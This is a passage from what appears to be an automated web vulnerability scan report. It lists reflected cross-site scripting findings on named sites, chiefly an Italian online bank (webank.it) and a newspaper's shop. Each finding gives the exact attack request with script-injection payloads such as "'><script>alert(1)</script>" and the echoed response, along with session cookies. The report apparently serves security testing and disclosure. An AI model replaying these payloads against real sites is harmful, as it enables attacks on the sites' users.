Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=039231f0a2f9caf8d26c29987e32457b212a69bccb46787c4dbf4457; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304420113577:ss=1304420113574; targetappl=https://www.auth.eni.it/en_IT/reserved/home-shadow.page

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:58 GMT
Cache-Control: no-cache="set-cookie"
Content-Length: 2302
Set-Cookie: JSESSIONID=n2tvN1GNXBJBFw3ngm2vJxGmYyPBSlxx4Qgyv1l2VChYJqrnVLX3!-2020469318; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: TS782077=039231f0a2f9caf8d26c29987e32457b212a69bccb46787c4dbf4457; Path=/


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<link rel="stylesheet" href="/it_ITc2c81"><script>alert(1)</script>05d12a7095a/static/css/mobile/mobile.css" media="screen" />
...[SNIP]...

4.40. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Category.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b5c7"><script>alert(1)</script>626d1de0ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sh4/catalog/Category.jsp?CATID=SH246140&4b5c7"><script>alert(1)</script>626d1de0ab=1 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; s_cc=true; s_nr=1304393236452-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:37:49 GMT
Set-Cookie: JSESSIONID=01EC0E3AE923672F051417E1FEAC132D; Path=/
Set-Cookie: ATG_SESSION_ID=01EC0E3AE923672F051417E1FEAC132D; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Cont
...[SNIP]...
<input name="4b5c7"><script>alert(1)</script>626d1de0ab" type="hidden" value="1"/>
...[SNIP]...

4.41. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Category.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7248'><script>alert(1)</script>243af41db24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sh4/catalog/Category.jsp?CATID=SH246140&b7248'><script>alert(1)</script>243af41db24=1 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; s_cc=true; s_nr=1304393236452-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:37:55 GMT
Set-Cookie: JSESSIONID=FE9BC8B10A09676DD5B1BF644DEBD840; Path=/
Set-Cookie: ATG_SESSION_ID=FE9BC8B10A09676DD5B1BF644DEBD840; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Cont
...[SNIP]...
<input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Category.jsp?CATID=SH246140&b7248'><script>alert(1)</script>243af41db24=1&login=failed'>
...[SNIP]...

4.42. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Product.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 87779'><script>alert(1)</script>162b4a1d039 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sh4/catalog/Product.jsp?PRODID=SH246237857&87779'><script>alert(1)</script>162b4a1d039=1 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp?CATID=SH245868
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookies=true; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedwww.shopping24.ilsole24ore.comwww.shopping24.ilsole24ore.com; s_lastvisit=1304398129881; SC_LINKS_NW=%5B%5BB%5D%5D; SC_LINKS_VG=%5B%5BB%5D%5D; JSESSIONID=53628C5A5A5C18CA15C1BF2309D1783D; ATG_SESSION_ID=53628C5A5A5C18CA15C1BF2309D1783D; s_cc=true; __utmz=30117245.1304398796.2.2.utmcsr=luxury24.ilsole24ore.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=30117245.1497251666.1304393428.1304393428.1304398796.2; __utmc=30117245; __utmb=30117245.1.10.1304398796; c=undefinedwww.luxury24.ilsole24ore.comwww.luxury24.ilsole24ore.com; s_nr=1304399018901-New; SC_LINKS_SH=S24%3Aprodotti%3ASoftware%3Ahome%5E%5E%5E%5ES24%3Aprodotti%3ASoftware%3Ahome%20%7C%20no%20%26lid%5E%5E; s_sq=s24oshoppreprod%3D%2526pid%253DS24%25253Aprodotti%25253ASoftware%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp%25253FPRODID%25253DSH246237857%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:13:25 GMT
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 34251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Small Office 24
...[SNIP]...
<input name="ErrURL" type="hidden" value='http://www.shopping24.ilsole24ore.com:80/sh4/catalog/Product.jsp?PRODID=SH246237857&87779'><script>alert(1)</script>162b4a1d039=1&login=failed'>
...[SNIP]...

4.43. https://www.webank.it/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d98eb'-alert(1)-'63578c43715 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d98eb'-alert(1)-'63578c43715=1 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:10:14 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 32022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_home_nw';
       var obsKey = 'nav_pub_wb_home_nw?d98eb'-alert(1)-'63578c43715=1';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var login_action_privati = 'lqgd7CdsPrF
...[SNIP]...

4.44. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [OBS_KEY parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The value of the OBS_KEY request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3bdfb'style%3d'x%3aexpression(alert(1))'6c2bb6a8eb3 was submitted in the OBS_KEY parameter. This input was echoed as 3bdfb'style='x:expression(alert(1))'6c2bb6a8eb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank3bdfb'style%3d'x%3aexpression(alert(1))'6c2bb6a8eb3 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:09:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: webank_sessionId=0000Vnqrp8rtzmOcaG9dXeDNWI_:15lb9kih8; Path=/
Set-Cookie: WsId=130438135429616680041160.765299070693942518956; Expires=Wed, 02 May 2012 00:09:14 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<input type="hidden" name="OBS_KEY" value='pro_wbn_apri_conto_webank3bdfb'style='x:expression(alert(1))'6c2bb6a8eb3' />
...[SNIP]...

4.45. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [OBS_KEY parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 572f4'-alert(1)-'a0f1e2f6476 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank572f4'-alert(1)-'a0f1e2f6476 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: webank_sessionId=0000zhp2RTV0-c6NSgI4EzNXEuj:15lb9kke0; Path=/
Set-Cookie: WsId=130438135888416680041160.353987200196531318959; Expires=Wed, 02 May 2012 00:09:18 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_conti_nw';
       var obsKey = 'pro_wbn_apri_conto_webank572f4'-alert(1)-'a0f1e2f6476';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var login_action_privati = 'lwHtAMSw9BODj
...[SNIP]...

4.46. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [tabId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5264c'-alert(1)-'a24ae3b893b was submitted in the tabId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw5264c'-alert(1)-'a24ae3b893b&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:08:56 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: webank_sessionId=0000-MpOZoETc6uopj89024ntQ2:15lb9keb5; Path=/
Set-Cookie: WsId=130438133643816680041160.1139854713653800618957; Expires=Wed, 02 May 2012 00:08:55 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_conti_nw5264c'-alert(1)-'a24ae3b893b';
       var obsKey = 'pro_wbn_apri_conto_webank';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

...[SNIP]...

4.47. https://www.webank.it/webankpub/wb/fpServizi.do [OBS_KEY parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/fpServizi.do

Issue detail

The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bafc6'-alert(1)-'e07e81d0343 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/fpServizi.do?tabId=nav_pub_wb_serveaiuto_nw&OBS_KEY=pro_wbn_serve_aiutobafc6'-alert(1)-'e07e81d0343 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: https://www.webank.it/webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ultimeTrePagine=*!*!*!*:*!*!*!*:nav_pub_wb_home_nw!nav_pub_wb_home_nw!*!*; openedLogin=true; webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:12:12 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 40794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_serveaiuto_nw';
       var obsKey = 'pro_wbn_serve_aiutobafc6'-alert(1)-'e07e81d0343';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var login_action_privati = 'ONlKQrGjkXhRV
...[SNIP]...

4.48. https://www.webank.it/webankpub/wb/fpServizi.do [tabId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/fpServizi.do

Issue detail

The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d828'-alert(1)-'64857d4afb was submitted in the tabId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/fpServizi.do?tabId=nav_pub_wb_serveaiuto_nw8d828'-alert(1)-'64857d4afb&OBS_KEY=pro_wbn_serve_aiuto HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: https://www.webank.it/webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ultimeTrePagine=*!*!*!*:*!*!*!*:nav_pub_wb_home_nw!nav_pub_wb_home_nw!*!*; openedLogin=true; webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:11:39 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 44599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_serveaiuto_nw8d828'-alert(1)-'64857d4afb';
       var obsKey = 'pro_wbn_serve_aiuto';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       va
...[SNIP]...

4.49. https://www.webank.it/webankpub/wb/home.do [OBS_KEY parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/home.do

Issue detail

The value of the OBS_KEY request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a419d'-alert(1)-'ffb669067a9 was submitted in the OBS_KEY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/home.do?tabId=nav_pub_wb_home_nw&OBS_KEY=nav_pub_wb_home_nwa419d'-alert(1)-'ffb669067a9 HTTP/1.1
Host: www.webank.it
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:10:14 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 32250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_home_nw';
       var obsKey = 'nav_pub_wb_home_nwa419d'-alert(1)-'ffb669067a9';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var login_action_privati = 'MBbmJoDCIdKWw
...[SNIP]...

4.50. https://www.webank.it/webankpub/wb/home.do [tabId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.webank.it
Path:   /webankpub/wb/home.do

Issue detail

The value of the tabId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c5f2'-alert(1)-'b008920cca9 was submitted in the tabId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webankpub/wb/home.do?tabId=nav_pub_wb_home_nw7c5f2'-alert(1)-'b008920cca9&OBS_KEY=nav_pub_wb_home_nw HTTP/1.1
Host: www.webank.it
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webank_sessionId=00006NUiuhojMCVEU150gVxV71s:15k5u2ve5; WsId=130438079291016680041160.490526356197404518463

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:09:58 GMT
Server: Apache/2.2.3 (Red Hat)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...
<script language="javascript" type="text/javascript">
       
       var tabId = 'nav_pub_wb_home_nw7c5f2'-alert(1)-'b008920cca9';
       var obsKey = 'nav_pub_wb_home_nw';
       var WSarea = 0;
       var imgPath = '/img/ret/';
       var cgi_script = '/webankpub';
       var cgi_host = 'www.webank.it';
       var cgi_protocol = 'https://';

       var
...[SNIP]...

4.51. http://www.addthis.com/bookmark.php [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e58f"><script>alert(1)</script>ec94702f118 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7e58f"><script>alert(1)</script>ec94702f118

Response

HTTP/1.1 200 OK
